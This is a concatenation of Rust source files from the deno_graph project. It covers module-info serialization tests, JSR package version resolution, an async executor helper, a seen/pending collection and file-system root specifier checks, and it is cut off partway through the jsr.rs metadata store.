#[cfg(test)]
mod test {
use std::collections::HashMap;
use pretty_assertions::assert_eq;
use serde::de::DeserializeOwned;
use serde_json::json;
use super::*;
#[test]
fn module_info_serialization_empty() {
// empty
let module_info = ModuleInfo {
is_script: false,
dependencies: Vec::new(),
ts_references: Vec::new(),
self_types_specifier: None,
jsx_import_source: None,
jsx_import_source_types: None,
jsdoc_imports: Vec::new(),
source_map_url: None,
};
run_serialization_test(&module_info, json!({}));
}
#[test]
fn module_info_serialization_deps() {
// with dependencies
let module_info = ModuleInfo {
is_script: true,
dependencies: Vec::from([
StaticDependencyDescriptor {
kind: StaticDependencyKind::ImportEquals,
types_specifier: Some(SpecifierWithRange {
text: "a".to_string(),
range: PositionRange {
start: Position::zeroed(),
end: Position::zeroed(),
},
}),
specifier: "./test".to_string(),
specifier_range: PositionRange {
start: Position {
line: 1,
character: 2,
},
end: Position {
line: 3,
character: 4,
},
},
import_attributes: ImportAttributes::None,
is_side_effect: false,
}
.into(),
DynamicDependencyDescriptor {
kind: DynamicDependencyKind::Import,
types_specifier: None,
argument: DynamicArgument::String("./test2".to_string()),
argument_range: PositionRange {
start: Position::zeroed(),
end: Position::zeroed(),
},
import_attributes: ImportAttributes::Known(HashMap::from([
("key".to_string(), ImportAttribute::Unknown),
(
"key2".to_string(),
ImportAttribute::Known("value".to_string()),
),
("kind".to_string(), ImportAttribute::Unknown),
])),
}
.into(),
DynamicDependencyDescriptor {
kind: DynamicDependencyKind::Require,
types_specifier: None,
argument: DynamicArgument::String("./test3".to_string()),
argument_range: PositionRange {
start: Position::zeroed(),
end: Position::zeroed(),
},
import_attributes: ImportAttributes::None,
}
.into(),
]),
ts_references: Vec::new(),
self_types_specifier: None,
jsx_import_source: None,
jsx_import_source_types: None,
jsdoc_imports: Vec::new(),
source_map_url: None,
};
run_serialization_test(
&module_info,
// WARNING: Deserialization MUST be backwards compatible in order
// to load data from JSR.
json!({
"script": true,
"dependencies": [{
"type": "static",
"kind": "importEquals",
"typesSpecifier": {
"text": "a",
"range": [[0, 0], [0, 0]],
},
"specifier": "./test",
"specifierRange": [[1, 2], [3, 4]],
}, {
"type": "dynamic",
"argument": "./test2",
"argumentRange": [[0, 0], [0, 0]],
"importAttributes": {
"known": {
"key": null,
"kind": null,
"key2": "value",
}
}
}, {
"type": "dynamic",
"kind": "require",
"argument": "./test3",
"argumentRange": [[0, 0], [0, 0]]
}]
}),
);
}
#[test]
fn module_info_serialization_ts_references() {
let module_info = ModuleInfo {
is_script: false,
dependencies: Vec::new(),
ts_references: Vec::from([
TypeScriptReference::Path(SpecifierWithRange {
text: "a".to_string(),
range: PositionRange {
start: Position::zeroed(),
end: Position::zeroed(),
},
}),
TypeScriptReference::Types {
specifier: SpecifierWithRange {
text: "b".to_string(),
range: PositionRange {
start: Position::zeroed(),
end: Position::zeroed(),
},
},
resolution_mode: None,
},
TypeScriptReference::Types {
specifier: SpecifierWithRange {
text: "node".to_string(),
range: PositionRange {
start: Position::zeroed(),
end: Position::zeroed(),
},
},
resolution_mode: Some(TypeScriptTypesResolutionMode::Require),
},
TypeScriptReference::Types {
specifier: SpecifierWithRange {
text: "node-esm".to_string(),
range: PositionRange {
start: Position::zeroed(),
end: Position::zeroed(),
},
},
resolution_mode: Some(TypeScriptTypesResolutionMode::Import),
},
]),
self_types_specifier: None,
jsx_import_source: None,
jsx_import_source_types: None,
jsdoc_imports: Vec::new(),
source_map_url: None,
};
run_serialization_test(
&module_info,
// WARNING: Deserialization MUST be backwards compatible in order
// to load data from JSR.
json!({
"tsReferences": [{
"type": "path",
"text": "a",
"range": [[0, 0], [0, 0]],
}, {
"type": "types",
"text": "b",
"range": [[0, 0], [0, 0]],
}, {
"type": "types",
"text": "node",
"range": [[0, 0], [0, 0]],
"resolutionMode": "require",
}, {
"type": "types",
"text": "node-esm",
"range": [[0, 0], [0, 0]],
"resolutionMode": "import",
}]
}),
);
}
#[test]
fn module_info_serialization_self_types_specifier() {
let module_info = ModuleInfo {
is_script: false,
dependencies: Vec::new(),
ts_references: Vec::new(),
self_types_specifier: Some(SpecifierWithRange {
text: "a".to_string(),
range: PositionRange {
start: Position::zeroed(),
end: Position::zeroed(),
},
}),
jsx_import_source: None,
jsx_import_source_types: None,
jsdoc_imports: Vec::new(),
source_map_url: None,
};
run_serialization_test(
&module_info,
// WARNING: Deserialization MUST be backwards compatible in order
// to load data from JSR.
json!({
"selfTypesSpecifier": {
"text": "a",
"range": [[0, 0], [0, 0]],
}
}),
);
}
#[test]
fn module_info_serialization_jsx_import_source() {
let module_info = ModuleInfo {
is_script: false,
dependencies: Vec::new(),
ts_references: Vec::new(),
self_types_specifier: None,
jsx_import_source: Some(SpecifierWithRange {
text: "a".to_string(),
range: PositionRange {
start: Position::zeroed(),
end: Position::zeroed(),
},
}),
jsx_import_source_types: None,
jsdoc_imports: Vec::new(),
source_map_url: None,
};
run_serialization_test(
&module_info,
// WARNING: Deserialization MUST be backwards compatible in order
// to load data from JSR.
json!({
"jsxImportSource": {
"text": "a",
"range": [[0, 0], [0, 0]],
}
}),
);
}
#[test]
fn module_info_serialization_jsx_import_source_types() {
let module_info = ModuleInfo {
is_script: false,
dependencies: Vec::new(),
ts_references: Vec::new(),
self_types_specifier: None,
jsx_import_source: None,
jsx_import_source_types: Some(SpecifierWithRange {
text: "a".to_string(),
range: PositionRange {
start: Position::zeroed(),
end: Position::zeroed(),
},
}),
jsdoc_imports: Vec::new(),
source_map_url: None,
};
run_serialization_test(
&module_info,
// WARNING: Deserialization MUST be backwards compatible in order
// to load data from JSR.
json!({
"jsxImportSourceTypes": {
"text": "a",
"range": [[0, 0], [0, 0]],
}
}),
);
}
#[test]
fn module_info_jsdoc_imports() {
let module_info = ModuleInfo {
is_script: false,
dependencies: Vec::new(),
ts_references: Vec::new(),
self_types_specifier: None,
jsx_import_source: None,
jsx_import_source_types: None,
jsdoc_imports: Vec::from([
JsDocImportInfo {
specifier: SpecifierWithRange {
text: "a".to_string(),
range: PositionRange {
start: Position::zeroed(),
end: Position::zeroed(),
},
},
resolution_mode: None,
},
JsDocImportInfo {
specifier: SpecifierWithRange {
text: "b".to_string(),
range: PositionRange {
start: Position::zeroed(),
end: Position::zeroed(),
},
},
resolution_mode: Some(TypeScriptTypesResolutionMode::Import),
},
JsDocImportInfo {
specifier: SpecifierWithRange {
text: "c".to_string(),
range: PositionRange {
start: Position::zeroed(),
end: Position::zeroed(),
},
},
resolution_mode: Some(TypeScriptTypesResolutionMode::Require),
},
]),
source_map_url: None,
};
run_serialization_test(
&module_info,
// WARNING: Deserialization MUST be backwards compatible in order
// to load data from JSR.
json!({
"jsdocImports": [{
"text": "a",
"range": [[0, 0], [0, 0]],
}, {
"text": "b",
"range": [[0, 0], [0, 0]],
"resolutionMode": "import",
}, {
"text": "c",
"range": [[0, 0], [0, 0]],
"resolutionMode": "require",
}]
}),
);
}
#[test]
fn static_dependency_descriptor_serialization() {
// with dependencies
let descriptor = DependencyDescriptor::Static(StaticDependencyDescriptor {
kind: StaticDependencyKind::ExportEquals,
types_specifier: Some(SpecifierWithRange {
text: "a".to_string(),
range: PositionRange {
start: Position::zeroed(),
end: Position::zeroed(),
},
}),
specifier: "./test".to_string(),
specifier_range: PositionRange {
start: Position::zeroed(),
end: Position::zeroed(),
},
import_attributes: ImportAttributes::Unknown,
is_side_effect: false,
});
run_serialization_test(
&descriptor,
// WARNING: Deserialization MUST be backwards compatible in order
// to load data from JSR.
json!({
"type": "static",
"kind": "exportEquals",
"typesSpecifier": {
"text": "a",
"range": [[0, 0], [0, 0]],
},
"specifier": "./test",
"specifierRange": [[0, 0], [0, 0]],
"importAttributes": "unknown",
}),
);
}
#[test]
fn static_dependency_descriptor_side_effect_serialization() {
// with dependencies
let descriptor = DependencyDescriptor::Static(StaticDependencyDescriptor {
kind: StaticDependencyKind::ExportEquals,
types_specifier: None,
specifier: "./test".to_string(),
specifier_range: PositionRange {
start: Position::zeroed(),
end: Position::zeroed(),
},
import_attributes: ImportAttributes::Unknown,
is_side_effect: true,
});
run_serialization_test(
&descriptor,
// WARNING: Deserialization MUST be backwards compatible in order
// to load data from JSR.
json!({
"type": "static",
"kind": "exportEquals",
"specifier": "./test",
"specifierRange": [[0, 0], [0, 0]],
"importAttributes": "unknown",
"sideEffect": true,
}),
);
}
#[test]
fn static_dependency_descriptor_import_source_serialization() {
let descriptor = DependencyDescriptor::Static(StaticDependencyDescriptor {
kind: StaticDependencyKind::ImportSource,
types_specifier: None,
specifier: "./test".to_string(),
specifier_range: PositionRange {
start: Position::zeroed(),
end: Position::zeroed(),
},
import_attributes: ImportAttributes::None,
is_side_effect: false,
});
run_serialization_test(
&descriptor,
// WARNING: Deserialization MUST be backwards compatible in order
// to load data from JSR.
json!({
"type": "static",
"kind": "importSource",
"specifier": "./test",
"specifierRange": [[0, 0], [0, 0]],
}),
);
}
#[test]
fn dynamic_dependency_descriptor_serialization() {
run_serialization_test(
&DependencyDescriptor::Dynamic(DynamicDependencyDescriptor {
kind: DynamicDependencyKind::Import,
types_specifier: Some(SpecifierWithRange {
text: "a".to_string(),
range: PositionRange {
start: Position::zeroed(),
end: Position::zeroed(),
},
}),
argument: DynamicArgument::Expr,
argument_range: PositionRange {
start: Position::zeroed(),
end: Position::zeroed(),
},
import_attributes: ImportAttributes::Unknown,
}),
// WARNING: Deserialization MUST be backwards compatible in order
// to load data from JSR.
json!({
"type": "dynamic",
"typesSpecifier": {
"text": "a",
"range": [[0, 0], [0, 0]],
},
"argumentRange": [[0, 0], [0, 0]],
"importAttributes": "unknown",
}),
);
run_serialization_test(
&DependencyDescriptor::Dynamic(DynamicDependencyDescriptor {
kind: DynamicDependencyKind::Import,
types_specifier: None,
argument: DynamicArgument::String("test".to_string()),
argument_range: PositionRange {
start: Position::zeroed(),
end: Position::zeroed(),
},
import_attributes: ImportAttributes::Unknown,
}),
// WARNING: Deserialization MUST be backwards compatible in order
// to load data from JSR.
json!({
"type": "dynamic",
"argument": "test",
"argumentRange": [[0, 0], [0, 0]],
"importAttributes": "unknown",
}),
);
}
#[test]
fn dynamic_dependency_descriptor_import_source_serialization() {
let descriptor =
DependencyDescriptor::Dynamic(DynamicDependencyDescriptor {
kind: DynamicDependencyKind::ImportSource,
types_specifier: None,
argument: DynamicArgument::String("test".to_string()),
argument_range: PositionRange {
start: Position::zeroed(),
end: Position::zeroed(),
},
import_attributes: ImportAttributes::None,
});
run_serialization_test(
&descriptor,
// WARNING: Deserialization MUST be backwards compatible in order
// to load data from JSR.
json!({
"type": "dynamic",
"kind": "importSource",
"argument": "test",
"argumentRange": [[0, 0], [0, 0]],
}),
);
}
#[test]
fn test_dynamic_argument_serialization() {
run_serialization_test(
&DynamicArgument::String("test".to_string()),
json!("test"),
);
run_serialization_test(
&DynamicArgument::Template(vec![
DynamicTemplatePart::String {
value: "test".to_string(),
},
DynamicTemplatePart::Expr,
]),
// WARNING: Deserialization MUST be backwards compatible in order
// to load data from JSR.
json!([{
"type": "string",
"value": "test",
}, {
"type": "expr",
}]),
);
}
#[test]
fn test_import_attributes_serialization() {
run_serialization_test(&ImportAttributes::Unknown, json!("unknown"));
run_serialization_test(
&ImportAttributes::Known(HashMap::from([(
"type".to_string(),
ImportAttribute::Unknown,
)])),
json!({
"known": {
"type": null,
}
}),
);
run_serialization_test(
&ImportAttributes::Known(HashMap::from([(
"type".to_string(),
ImportAttribute::Known("test".to_string()),
)])),
json!({
"known": {
"type": "test",
}
}),
);
}
#[test]
fn test_v1_to_v2_deserialization_with_leading_comment() {
let expected = ModuleInfo {
is_script: false,
dependencies: vec![DependencyDescriptor::Static(
| rust | MIT | 200a22dbd56b311d490ad00bed57fce34538598e | 2026-01-04T20:22:02.257944Z | true |
denoland/deno_graph | https://github.com/denoland/deno_graph/blob/200a22dbd56b311d490ad00bed57fce34538598e/src/packages.rs | src/packages.rs | // Copyright 2018-2024 the Deno authors. MIT license.
use std::collections::BTreeMap;
use std::collections::BTreeSet;
use std::collections::HashMap;
use std::collections::HashSet;
use deno_semver::StackString;
use deno_semver::Version;
use deno_semver::VersionReq;
use deno_semver::jsr::JsrDepPackageReq;
use deno_semver::package::PackageName;
use deno_semver::package::PackageNv;
use deno_semver::package::PackageReq;
use serde::Deserialize;
use serde::Serialize;
use crate::analysis::ModuleInfo;
use crate::analysis::module_graph_1_to_2;
use crate::graph::JsrPackageReqNotFoundError;
#[derive(Debug, Default, Clone, Copy, Serialize, Deserialize)]
pub struct NewestDependencyDate(pub chrono::DateTime<chrono::Utc>);
impl std::fmt::Display for NewestDependencyDate {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
write!(f, "{}", self.0)
}
}
impl NewestDependencyDate {
pub fn matches(&self, date: chrono::DateTime<chrono::Utc>) -> bool {
date < self.0
}
}
#[derive(Debug, Default, Clone, Serialize, Deserialize)]
#[serde(rename_all = "camelCase")]
pub struct NewestDependencyDateOptions {
/// Prevents installing packages newer than the specified date.
pub date: Option<NewestDependencyDate>,
/// JSR packages to exclude from the newest dependency date checks.
#[serde(default, skip_serializing_if = "BTreeSet::is_empty")]
pub exclude_jsr_pkgs: BTreeSet<PackageName>,
}
impl NewestDependencyDateOptions {
pub fn from_date(date: chrono::DateTime<chrono::Utc>) -> Self {
Self {
date: Some(NewestDependencyDate(date)),
exclude_jsr_pkgs: Default::default(),
}
}
pub fn get_for_package(
&self,
package_name: &PackageName,
) -> Option<NewestDependencyDate> {
let date = self.date?;
if self.exclude_jsr_pkgs.contains(package_name) {
None
} else {
Some(date)
}
}
}
#[derive(Debug, Serialize, Deserialize, Clone)]
pub struct JsrPackageInfo {
pub versions: HashMap<Version, JsrPackageInfoVersion>,
}
fn is_false(v: &bool) -> bool {
!v
}
#[derive(Debug, Serialize, Deserialize, Clone, Default)]
#[serde(rename_all = "camelCase")]
pub struct JsrPackageInfoVersion {
#[serde(default, skip_serializing_if = "Option::is_none")]
pub created_at: Option<chrono::DateTime<chrono::Utc>>,
#[serde(default, skip_serializing_if = "is_false")]
pub yanked: bool,
}
impl JsrPackageInfoVersion {
pub fn matches_newest_dependency_date(
&self,
cutoff: NewestDependencyDate,
) -> bool {
// assume versions not existing are really old
self
.created_at
.map(|created_at| cutoff.matches(created_at))
.unwrap_or(true)
}
}
#[derive(Debug, Serialize, Deserialize, Clone, Default)]
#[serde(rename_all = "camelCase")]
pub struct JsrPackageVersionManifestEntry {
pub checksum: String,
}
#[derive(Debug, Serialize, Deserialize, Clone, Default)]
pub struct JsrPackageVersionInfo {
// ensure the fields on here are resilient to change
#[serde(default)]
pub exports: serde_json::Value,
#[serde(rename = "moduleGraph1")]
pub module_graph_1: Option<serde_json::Value>,
#[serde(rename = "moduleGraph2")]
pub module_graph_2: Option<serde_json::Value>,
pub manifest: HashMap<String, JsrPackageVersionManifestEntry>,
/// This is a property that deno_cache_dir sets when copying from
/// the global to the local cache. If it's set, put this in the lockfile
/// instead of computing the checksum from the file bytes. This is necessary
/// because we store less data in the metadata files found in the vendor
/// directory than in the global cache and also someone may modify the vendored
/// files then regenerate the lockfile.
#[serde(rename = "lockfileChecksum")]
pub lockfile_checksum: Option<String>,
}
impl JsrPackageVersionInfo {
/// Resolves the provided export key.
///
/// Note: This assumes the provided export name is normalized.
pub fn export(&self, export_name: &str) -> Option<&str> {
match &self.exports {
serde_json::Value::String(value) => {
if export_name == "." {
Some(value.as_str())
} else {
None
}
}
serde_json::Value::Object(map) => match map.get(export_name) {
Some(serde_json::Value::String(value)) => Some(value.as_str()),
_ => None,
},
_ => None,
}
}
/// Gets the key and values of the exports map.
pub fn exports(&self) -> Box<dyn Iterator<Item = (&str, &str)> + '_> {
match &self.exports {
serde_json::Value::String(value) => {
Box::new(std::iter::once((".", value.as_str())))
}
serde_json::Value::Object(map) => {
Box::new(map.iter().filter_map(|(key, value)| match value {
serde_json::Value::String(value) => {
Some((key.as_str(), value.as_str()))
}
_ => None,
}))
}
_ => Box::new(std::iter::empty()),
}
}
pub fn module_info(&self, specifier: &str) -> Option<ModuleInfo> {
if let Some(module_graph) = self.module_graph_2.as_ref() {
let module_graph = module_graph.as_object()?;
let module_info = module_graph.get(specifier)?;
serde_json::from_value(module_info.clone()).ok()
} else if let Some(module_graph) = self.module_graph_1.as_ref() {
let module_graph = module_graph.as_object()?;
let mut module_info = module_graph.get(specifier)?.clone();
module_graph_1_to_2(&mut module_info);
serde_json::from_value(module_info).ok()
} else {
None
}
}
}
#[derive(Debug, Clone)]
struct PackageNvInfo {
/// Collection of exports used.
exports: BTreeMap<String, String>,
found_dependencies: HashSet<JsrDepPackageReq>,
}
#[derive(Debug, Clone, Default, Serialize)]
pub struct PackageSpecifiers {
#[serde(flatten)]
package_reqs: BTreeMap<PackageReq, PackageNv>,
#[serde(skip_serializing)]
packages_by_name: HashMap<StackString, Vec<PackageNv>>,
#[serde(skip_serializing)]
packages: BTreeMap<PackageNv, PackageNvInfo>,
/// Cache for packages that have a referrer outside JSR.
#[serde(skip_serializing)]
top_level_packages: BTreeSet<PackageNv>,
#[serde(skip_serializing)]
used_yanked_packages: BTreeSet<PackageNv>,
}
impl PackageSpecifiers {
pub fn is_empty(&self) -> bool {
self.package_reqs.is_empty()
}
/// The total number of JSR packages found in the graph.
pub fn packages_len(&self) -> usize {
self.packages.len()
}
/// The total number of dependencies of jsr packages found in the graph.
pub fn package_deps_sum(&self) -> usize {
self
.packages
.iter()
.map(|p| p.1.found_dependencies.len())
.sum()
}
pub fn add_nv(&mut self, package_req: PackageReq, nv: PackageNv) {
let nvs = self
.packages_by_name
.entry(package_req.name.clone())
.or_default();
if !nvs.contains(&nv) {
nvs.push(nv.clone());
}
self.package_reqs.insert(package_req, nv.clone());
}
pub(crate) fn ensure_package(&mut self, nv: PackageNv) {
self.packages.entry(nv).or_insert_with(|| PackageNvInfo {
exports: Default::default(),
found_dependencies: Default::default(),
});
}
/// Gets the dependencies (package constraints) of JSR packages found in the graph.
pub fn packages_with_deps(
&self,
) -> impl Iterator<Item = (&PackageNv, impl Iterator<Item = &JsrDepPackageReq>)>
{
self.packages.iter().map(|(nv, info)| {
let deps = info.found_dependencies.iter();
(nv, deps)
})
}
pub(crate) fn add_dependency(
&mut self,
nv: &PackageNv,
dep: JsrDepPackageReq,
) {
self
.packages
.get_mut(nv)
.unwrap()
.found_dependencies
.insert(dep);
}
pub(crate) fn add_export(
&mut self,
nv: &PackageNv,
export: (String, String),
) {
self
.packages
.get_mut(nv)
.unwrap()
.exports
.insert(export.0, export.1);
}
pub(crate) fn add_top_level_package(&mut self, nv: PackageNv) {
self.top_level_packages.insert(nv);
}
pub(crate) fn top_level_packages(&self) -> &BTreeSet<PackageNv> {
&self.top_level_packages
}
pub(crate) fn add_used_yanked_package(&mut self, nv: PackageNv) {
self.used_yanked_packages.insert(nv);
}
pub fn used_yanked_packages(&mut self) -> impl Iterator<Item = &PackageNv> {
self.used_yanked_packages.iter()
}
pub fn package_exports(
&self,
nv: &PackageNv,
) -> Option<&BTreeMap<String, String>> {
self.packages.get(nv).map(|p| &p.exports)
}
pub fn versions_by_name(&self, name: &str) -> Option<&Vec<PackageNv>> {
self.packages_by_name.get(name)
}
pub fn mappings(&self) -> &BTreeMap<PackageReq, PackageNv> {
&self.package_reqs
}
}
pub struct JsrVersionResolverResolvedVersion<'a> {
pub is_yanked: bool,
pub version: &'a Version,
}
#[derive(Debug, Default, Clone)]
pub struct JsrVersionResolver {
pub newest_dependency_date_options: NewestDependencyDateOptions,
}
impl JsrVersionResolver {
pub fn get_for_package<'a>(
&'a self,
package_name: &PackageName,
package_info: &'a JsrPackageInfo,
) -> JsrPackageVersionResolver<'a> {
JsrPackageVersionResolver {
package_info,
newest_dependency_date: self
.newest_dependency_date_options
.get_for_package(package_name),
}
}
}
pub struct JsrPackageVersionResolver<'a> {
package_info: &'a JsrPackageInfo,
newest_dependency_date: Option<NewestDependencyDate>,
}
impl<'a> JsrPackageVersionResolver<'a> {
pub fn info(&self) -> &'a JsrPackageInfo {
self.package_info
}
pub fn resolve_version<'b>(
&'b self,
package_req: &PackageReq,
existing_versions: impl Iterator<Item = &'b Version>,
) -> Result<JsrVersionResolverResolvedVersion<'b>, JsrPackageReqNotFoundError>
{
// 1. try to resolve with the list of existing versions
if let ResolveVersionResult::Some(version) = resolve_version(
ResolveVersionOptions {
version_req: &package_req.version_req,
// don't use this here because existing versions are ok to resolve to
newest_dependency_date: None,
},
existing_versions.map(|v| (v, None)),
) {
let is_yanked = self
.package_info
.versions
.get(version)
.map(|i| i.yanked)
.unwrap_or(false);
return Ok(JsrVersionResolverResolvedVersion { is_yanked, version });
}
// 2. attempt to resolve with the unyanked versions
let mut any_had_higher_newest_dep_date_version = false;
let unyanked_versions = self
.package_info
.versions
.iter()
.filter_map(|(v, i)| if !i.yanked { Some((v, Some(i))) } else { None });
match resolve_version(
ResolveVersionOptions {
version_req: &package_req.version_req,
newest_dependency_date: self.newest_dependency_date,
},
unyanked_versions,
) {
ResolveVersionResult::Some(version) => {
return Ok(JsrVersionResolverResolvedVersion {
is_yanked: false,
version,
});
}
ResolveVersionResult::None {
had_higher_date_version,
} => {
any_had_higher_newest_dep_date_version |= had_higher_date_version;
}
}
// 3. attempt to resolve with the the yanked versions
let yanked_versions = self
.package_info
.versions
.iter()
.filter_map(|(v, i)| if i.yanked { Some((v, Some(i))) } else { None });
match resolve_version(
ResolveVersionOptions {
version_req: &package_req.version_req,
newest_dependency_date: self.newest_dependency_date,
},
yanked_versions,
) {
ResolveVersionResult::Some(version) => {
return Ok(JsrVersionResolverResolvedVersion {
is_yanked: true,
version,
});
}
ResolveVersionResult::None {
had_higher_date_version,
} => {
any_had_higher_newest_dep_date_version |= had_higher_date_version;
}
}
Err(JsrPackageReqNotFoundError {
req: package_req.clone(),
newest_dependency_date: any_had_higher_newest_dep_date_version
.then_some(self.newest_dependency_date)
.flatten(),
})
}
pub fn matches_newest_dependency_date(
&self,
version_info: &JsrPackageInfoVersion,
) -> bool {
match self.newest_dependency_date {
Some(newest_dependency_date) => {
version_info.matches_newest_dependency_date(newest_dependency_date)
}
None => true,
}
}
}
pub struct ResolveVersionOptions<'a> {
pub version_req: &'a VersionReq,
pub newest_dependency_date: Option<NewestDependencyDate>,
}
pub enum ResolveVersionResult<'a> {
Some(&'a Version),
None { had_higher_date_version: bool },
}
pub fn resolve_version<'a>(
options: ResolveVersionOptions<'_>,
versions: impl Iterator<Item = (&'a Version, Option<&'a JsrPackageInfoVersion>)>,
) -> ResolveVersionResult<'a> {
let mut maybe_best_version: Option<&Version> = None;
let mut had_higher_date_version = false;
for (version, version_info) in versions {
if options.version_req.matches(version) {
had_higher_date_version = true;
if matches_newest_dependency_date(
version_info,
options.newest_dependency_date,
) {
let is_best_version = maybe_best_version
.as_ref()
.map(|best_version| (*best_version).cmp(version).is_lt())
.unwrap_or(true);
if is_best_version {
maybe_best_version = Some(version);
}
}
}
}
match maybe_best_version {
Some(version) => ResolveVersionResult::Some(version),
None => ResolveVersionResult::None {
had_higher_date_version,
},
}
}
fn matches_newest_dependency_date(
info: Option<&JsrPackageInfoVersion>,
newest_dependency_date: Option<NewestDependencyDate>,
) -> bool {
info
.as_ref()
.and_then(|info| {
newest_dependency_date.map(|d| info.matches_newest_dependency_date(d))
})
.unwrap_or(true)
}
| rust | MIT | 200a22dbd56b311d490ad00bed57fce34538598e | 2026-01-04T20:22:02.257944Z | false |
denoland/deno_graph | https://github.com/denoland/deno_graph/blob/200a22dbd56b311d490ad00bed57fce34538598e/src/rt.rs | src/rt.rs | // Copyright 2018-2024 the Deno authors. MIT license.
use futures::channel::oneshot;
use std::future::Future;
use std::pin::Pin;
use std::task::Context;
use std::task::Poll;
pub type BoxedFuture = Pin<Box<dyn Future<Output = ()> + 'static>>;
/// An executor for futures.
///
/// This trait allows deno_graph to run background tasks on
/// the async executor.
pub trait Executor {
/// Spawns a future to run on this executor.
fn execute(&self, fut: BoxedFuture) -> BoxedFuture;
}
impl<'a> Default for &'a dyn Executor {
fn default() -> &'a dyn Executor {
{
struct DefaultExecutor;
impl Executor for DefaultExecutor {
fn execute(&self, future: BoxedFuture) -> BoxedFuture {
#[cfg(target_arch = "wasm32")]
return future;
#[cfg(not(target_arch = "wasm32"))]
{
use futures::FutureExt;
deno_unsync::spawn(future).map(|v| v.unwrap()).boxed_local()
}
}
}
&DefaultExecutor
}
}
}
pub(crate) struct JoinHandle<T> {
rx: oneshot::Receiver<T>,
fut: BoxedFuture,
}
impl<T> Future for JoinHandle<T> {
type Output = T;
fn poll(mut self: Pin<&mut Self>, cx: &mut Context) -> Poll<Self::Output> {
if let Poll::Ready(()) = Pin::new(&mut self.fut).poll(cx) {
match Pin::new(&mut self.rx).poll(cx) {
Poll::Ready(Ok(res)) => Poll::Ready(res),
_ => {
panic!("task panic");
}
}
} else {
Poll::Pending
}
}
}
pub(crate) fn spawn<F, T: 'static>(
executor: &dyn Executor,
f: F,
) -> JoinHandle<T>
where
F: Future<Output = T> + 'static,
{
let (tx, rx) = oneshot::channel();
let fut = executor.execute(Box::pin(async move {
tx.send(f.await).ok();
}));
JoinHandle { rx, fut }
}
| rust | MIT | 200a22dbd56b311d490ad00bed57fce34538598e | 2026-01-04T20:22:02.257944Z | false |
denoland/deno_graph | https://github.com/denoland/deno_graph/blob/200a22dbd56b311d490ad00bed57fce34538598e/src/collections.rs | src/collections.rs | // Copyright 2018-2024 the Deno authors. MIT license.
use indexmap::IndexSet;
/// Collection useful for a phased pass where the pending items
/// are the same values as the seen items.
pub struct SeenPendingCollection<T: std::hash::Hash + Eq + Clone> {
inner: IndexSet<T>,
next_index: usize,
}
impl<T: std::hash::Hash + Eq + Clone> SeenPendingCollection<T> {
pub fn with_capacity(capacity: usize) -> Self {
Self {
inner: IndexSet::with_capacity(capacity),
next_index: 0,
}
}
pub fn has_seen(&self, item: &T) -> bool {
self.inner.contains(item)
}
pub fn add(&mut self, item: T) -> bool {
self.inner.insert(item)
}
pub fn extend(&mut self, items: impl Iterator<Item = T>) {
self.inner.extend(items)
}
pub fn next_pending(&mut self) -> Option<T> {
let next = self.inner.get_index(self.next_index);
if next.is_some() {
self.next_index += 1;
}
next.cloned()
}
}
| rust | MIT | 200a22dbd56b311d490ad00bed57fce34538598e | 2026-01-04T20:22:02.257944Z | false |
denoland/deno_graph | https://github.com/denoland/deno_graph/blob/200a22dbd56b311d490ad00bed57fce34538598e/src/module_specifier.rs | src/module_specifier.rs | // Copyright 2018-2024 the Deno authors. MIT license.
pub type ModuleSpecifier = url::Url;
pub use import_map::specifier::SpecifierError;
pub use import_map::specifier::resolve_import;
pub fn is_fs_root_specifier(url: &ModuleSpecifier) -> bool {
if url.scheme() != "file" {
return false;
}
let path = url.path();
let path = path.trim_start_matches('/').trim_end_matches('/');
let mut parts = path.split('/');
let Some(first_part) = parts.next() else {
return true;
};
if parts.next().is_some() {
return false;
}
let mut first_part_chars = first_part.chars();
let Some(first_char) = first_part_chars.next() else {
return true;
};
let Some(second_char) = first_part_chars.next() else {
return false;
};
// Windows path: file:///C:/example
first_part_chars.next().is_none()
&& first_char.is_ascii_alphabetic()
&& second_char == ':'
}
#[cfg(test)]
mod test {
use crate::ModuleSpecifier;
use super::*;
#[test]
fn test_is_fs_root_specifier() {
let cases = [
("https://deno.land", false),
("file:///", true),
("file://", true),
("file:///C:/", true),
("file:///V:/", true),
("file:///V:/test/", false),
];
for (specifier, expected) in cases {
let url = ModuleSpecifier::parse(specifier).unwrap();
assert_eq!(is_fs_root_specifier(&url), expected, "{:?}", specifier);
}
}
}
| rust | MIT | 200a22dbd56b311d490ad00bed57fce34538598e | 2026-01-04T20:22:02.257944Z | false |
denoland/deno_graph | https://github.com/denoland/deno_graph/blob/200a22dbd56b311d490ad00bed57fce34538598e/src/jsr.rs | src/jsr.rs | // Copyright 2018-2024 the Deno authors. MIT license.
use std::cell::RefCell;
use std::collections::HashMap;
use std::sync::Arc;
use deno_semver::package::PackageNv;
use deno_unsync::future::LocalFutureExt;
use deno_unsync::future::SharedLocal;
use futures::FutureExt;
use crate::Executor;
use crate::ModuleSpecifier;
use crate::graph::JsrLoadError;
use crate::packages::JsrPackageInfo;
use crate::packages::JsrPackageVersionInfo;
use crate::rt::JoinHandle;
use crate::rt::spawn;
use crate::source::CacheSetting;
use crate::source::JsrUrlProvider;
use crate::source::LoadError;
use crate::source::LoadOptions;
use crate::source::LoadResponse;
use crate::source::Loader;
use crate::source::LoaderChecksum;
use crate::source::Locker;
#[derive(Debug, Clone)]
pub struct PendingJsrPackageVersionInfoLoadItem {
pub checksum_for_locker: Option<LoaderChecksum>,
pub info: Arc<JsrPackageVersionInfo>,
}
pub type PendingResult<T> = SharedLocal<JoinHandle<Result<T, JsrLoadError>>>;
#[derive(Clone, Copy)]
pub struct JsrMetadataStoreServices<'a> {
pub loader: &'a dyn Loader,
pub executor: &'a dyn Executor,
pub jsr_url_provider: &'a dyn JsrUrlProvider,
}
#[derive(Debug, Default)]
pub struct JsrMetadataStore {
pending_package_info_loads:
RefCell<HashMap<String, PendingResult<Arc<JsrPackageInfo>>>>,
pending_package_version_info_loads: RefCell<
HashMap<PackageNv, PendingResult<PendingJsrPackageVersionInfoLoadItem>>,
>,
}
impl JsrMetadataStore {
pub(crate) fn get_package_metadata(
&self,
package_name: &str,
) -> Option<PendingResult<Arc<JsrPackageInfo>>> {
self
.pending_package_info_loads
.borrow()
.get(package_name)
.cloned()
}
pub(crate) fn remove_package_metadata(&self, package_name: &str) {
self
.pending_package_info_loads
.borrow_mut()
.remove(package_name);
}
pub(crate) fn get_package_version_metadata(
&self,
nv: &PackageNv,
) -> Option<PendingResult<PendingJsrPackageVersionInfoLoadItem>> {
self
